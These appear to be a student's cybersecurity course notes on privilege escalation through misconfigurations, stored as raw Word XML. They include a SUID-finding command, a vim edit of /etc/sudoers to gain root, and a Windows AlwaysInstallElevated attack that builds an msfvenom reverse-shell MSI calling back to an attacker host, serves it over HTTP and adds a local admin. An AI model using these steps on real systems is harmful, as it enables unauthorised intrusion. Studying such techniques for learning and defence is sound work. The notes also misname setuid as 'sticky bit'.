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06F" w14:textId="07D972B2" w:rsidR="005839E0" w:rsidRDefault="00475437">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00475437">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Common Config Issues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C11CD23" w14:textId="11F79394" w:rsidR="00475437" w:rsidRDefault="00475437">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61E562C4" w14:textId="398CFE5C" w:rsidR="00475437" w:rsidRDefault="00475437">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When classic privilege escalation methods don’t work, we try to use config issues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7106D541" w14:textId="499A5A15" w:rsidR="00475437" w:rsidRPr="00475437" w:rsidRDefault="00475437" w:rsidP="00475437">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00475437">
        <w:t>Services running as root or admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417EB6CA" w14:textId="293C196C" w:rsidR="00475437" w:rsidRDefault="00475437" w:rsidP="00475437">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00475437">
        <w:t>Misconfigs in those services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A8001B" w14:textId="643F0C7F" w:rsidR="00475437" w:rsidRDefault="00475437" w:rsidP="00475437"/>
    <w:p w14:paraId="61CF4BC3" w14:textId="403077E1" w:rsidR="00475437" w:rsidRDefault="00475437" w:rsidP="00475437">
      <w:r>
        <w:t>Best way to get a starting point on these Misconfigs is to just google the privilege escalation techniques or common Misconfigs in that particular service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E73DAD1" w14:textId="5D9E4E54" w:rsidR="00475437" w:rsidRDefault="00475437" w:rsidP="00475437"/>
    <w:p w14:paraId="1D2FD485" w14:textId="304DEFD6" w:rsidR="00475437" w:rsidRPr="00304B69" w:rsidRDefault="00475437" w:rsidP="00475437">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00304B69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sticky bits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F6A482" w14:textId="05D043CA" w:rsidR="00475437" w:rsidRDefault="00475437" w:rsidP="00475437">
      <w:r>
        <w:t>Allows you to execute a binary as root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3D9303" w14:textId="00BD70EF" w:rsidR="00475437" w:rsidRDefault="00475437" w:rsidP="00475437">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D8E791" w14:textId="469173A7" w:rsidR="00475437" w:rsidRDefault="00475437" w:rsidP="00475437">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sudo </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550EA76E" w14:textId="76FD4BD9" w:rsidR="00475437" w:rsidRDefault="00475437" w:rsidP="00475437">
      <w:r>
        <w:t>See which sudo binaries exist on the machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E53B69F" w14:textId="0FE935AC" w:rsidR="00475437" w:rsidRDefault="00475437" w:rsidP="00475437">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Find / -type f \( -perm -4000 -o -perm -2000 \) -exec ls -p {} \; 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BCC5AE" w14:textId="3B563F78" w:rsidR="00475437" w:rsidRDefault="00475437" w:rsidP="00475437">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>#-perm -4000 is stickybit and -perm -2000 is the groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CDA09A" w14:textId="6B8F1B64" w:rsidR="00475437" w:rsidRDefault="00475437" w:rsidP="00475437">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="003010A0">
        <w:t>Permissions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> denied’ kicked to /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3527C362" w14:textId="530FF34D" w:rsidR="00475437" w:rsidRDefault="00475437" w:rsidP="00475437">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In terms of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wrx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, s stands for stickybit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F5BD52" w14:textId="7A3E69E7" w:rsidR="00E550FA" w:rsidRDefault="00E550FA" w:rsidP="00E550FA">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D9A6A69" wp14:editId="0FC7ACD7">
            <wp:extent cx="5421145" cy="284797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40304" b="44246"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5429362" cy="285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ACCB" w14:textId="6EFEB48C" w:rsidR="00E550FA" w:rsidRDefault="00E550FA" w:rsidP="00E550FA">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C613FAB" w14:textId="7B76253C" w:rsidR="00E550FA" w:rsidRDefault="00E550FA" w:rsidP="00E550FA">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Vi shows up as a service we have access to that also has a stickybit (sudo permissions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7F65A1" w14:textId="786AD4FC" w:rsidR="00E550FA" w:rsidRDefault="00E550FA" w:rsidP="00E550FA">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3579BF5C" w14:textId="37920517" w:rsidR="00E550FA" w:rsidRDefault="00E550FA" w:rsidP="00E550FA">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Cant spawn a shell because it’ll spawn as the guest user (current user)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DA1A6B" w14:textId="268B2053" w:rsidR="00E550FA" w:rsidRDefault="00E550FA" w:rsidP="00E550FA">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Can abuse the fact that vi is a text editor and edit a sudo file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4263DB02" w14:textId="186AF0BF" w:rsidR="00E550FA" w:rsidRDefault="00E550FA" w:rsidP="00E550FA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vim.gtk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /etc/sudoers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A29DD6" w14:textId="3BF096C9" w:rsidR="00E550FA" w:rsidRDefault="00E550FA" w:rsidP="00E550FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>#Path for vi sudoers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFB7101" w14:textId="39BC2B25" w:rsidR="00E550FA" w:rsidRDefault="00E550FA" w:rsidP="00E550FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Then add current user as a sudoer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D002C9" w14:textId="7779C48B" w:rsidR="00E550FA" w:rsidRDefault="00E550FA" w:rsidP="00E550FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Admin</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>ALL=(ALL:ALL) ALL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1575FAD8" w14:textId="17D579DC" w:rsidR="00E550FA" w:rsidRDefault="00E550FA" w:rsidP="00E550FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">#Same permissions as root </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="73B0A26B" w14:textId="56EA0260" w:rsidR="00E550FA" w:rsidRDefault="00E550FA" w:rsidP="00E550FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Then you can sudo as root and launch a prompt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A69F224" w14:textId="6C1ABD97" w:rsidR="00E550FA" w:rsidRDefault="00E550FA" w:rsidP="00E550FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Sudo -u root /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E84A35" w14:textId="43093700" w:rsidR="003010A0" w:rsidRDefault="003010A0" w:rsidP="003010A0"/>
    <w:p w14:paraId="538FDB95" w14:textId="244C3C74" w:rsidR="003010A0" w:rsidRDefault="003010A0" w:rsidP="003010A0">
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB7F360" w14:textId="35810B7F" w:rsidR="003010A0" w:rsidRDefault="003010A0" w:rsidP="003010A0">
      <w:r>
        <w:t xml:space="preserve">Registry editor </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AlwaysInstalElevated</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="32A2D7C3" w14:textId="4FB0D7A7" w:rsidR="003010A0" w:rsidRDefault="003010A0" w:rsidP="003010A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Allows users to install MSI binaries and execute those binaries as ‘system’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4DF2BD" w14:textId="05AB8105" w:rsidR="003010A0" w:rsidRDefault="003010A0" w:rsidP="003010A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Build shell and place into exploit.msi </w:t>
      </w:r>
      <w:r w:rsidR="00B3776A">
        <w:t>as an executable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB7C2A2" w14:textId="2D0AF4B7" w:rsidR="003010A0" w:rsidRDefault="003010A0" w:rsidP="003010A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">=&lt;addr&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=&lt;</w:t>
      </w:r>
      <w:r w:rsidR="00FB64B0">
        <w:t>4444</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r w:rsidR="00FB64B0">
        <w:t xml:space="preserve">-f </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FB64B0">
        <w:t>msi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FB64B0">
        <w:t xml:space="preserve"> &gt; explot.msi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185AE899" w14:textId="5CC31E26" w:rsidR="00FB64B0" w:rsidRDefault="00B3776A" w:rsidP="00FB64B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Python -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SimpleHTTPserver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44688041" w14:textId="49CF2850" w:rsidR="00B3776A" w:rsidRDefault="002E6297" w:rsidP="00B3776A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidR="00B3776A">
        <w:t>Creates simple python http server on port 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E04B0B7" w14:textId="605E079F" w:rsidR="00B3776A" w:rsidRDefault="00BA7AAF" w:rsidP="00B3776A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The exploit file can be grabbed from the target </w:t>
      </w:r>
      <w:r w:rsidR="002E6297">
        <w:t xml:space="preserve">by accessing the shell in a browser </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="002E6297">
        <w:t>e.g.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="002E6297">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002E6297" w:rsidRPr="002E6297">
        <w:t>https://192.168.0.4/exploit.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2513984F" w14:textId="35A77A81" w:rsidR="002E6297" w:rsidRDefault="002E6297" w:rsidP="002E6297">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Then download on to target and run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7513710A" w14:textId="63CDADEC" w:rsidR="002E6297" w:rsidRDefault="002E6297" w:rsidP="002E6297">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Root shell is activated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64962C85" w14:textId="4241D5C8" w:rsidR="002E6297" w:rsidRDefault="002E6297" w:rsidP="002E6297">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Net </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>localgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> administrators admin2 /add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B32C99" w14:textId="4AAF16E3" w:rsidR="002E6297" w:rsidRDefault="002E6297" w:rsidP="002E6297">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>#Adds user to local admin group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0DE91E" w14:textId="6D8F4646" w:rsidR="006F2663" w:rsidRDefault="006F2663" w:rsidP="006F2663"/>
    <w:p w14:paraId="2C87D3A8" w14:textId="55A50C57" w:rsidR="006F2663" w:rsidRPr="006F2663" w:rsidRDefault="006F2663" w:rsidP="006F2663">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2663">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">HW – do further research on typical configs and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F2663">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>misconfigs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F2663">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> and make a list of where to look</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DCE982" w14:textId="5D8EF098" w:rsidR="003010A0" w:rsidRDefault="003010A0" w:rsidP="003010A0">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D46776" w14:textId="3B001107" w:rsidR="00E550FA" w:rsidRDefault="00E550FA" w:rsidP="00E550FA">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C9A0B98" w14:textId="0CBB75BA" w:rsidR="00304B69" w:rsidRDefault="00304B69" w:rsidP="00E550FA">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EA01A32" w14:textId="77777777" w:rsidR="00304B69" w:rsidRPr="00475437" w:rsidRDefault="00304B69" w:rsidP="00E550FA">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00304B69" w:rsidRPr="0047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233D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="20247A8E"/>
    <w:lvl w:ilvl="0" w:tplc="6A385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37"/>
    <w:rsid w:val="002E6297"/>
    <w:rsid w:val="003010A0"/>
    <w:rsid w:val="00304B69"/>
    <w:rsid w:val="00475437"/>
    <w:rsid w:val="004B7BBD"/>
    <w:rsid w:val="005839E0"/>
    <w:rsid w:val="005F405A"/>
    <w:rsid w:val="006F2663"/>
    <w:rsid w:val="00B3776A"/>
    <w:rsid w:val="00BA7AAF"/>
    <w:rsid w:val="00E550FA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12F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3B1915B3-F405-472D-AED1-4A33E52B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2023-02-07T11:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-02-07T12:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>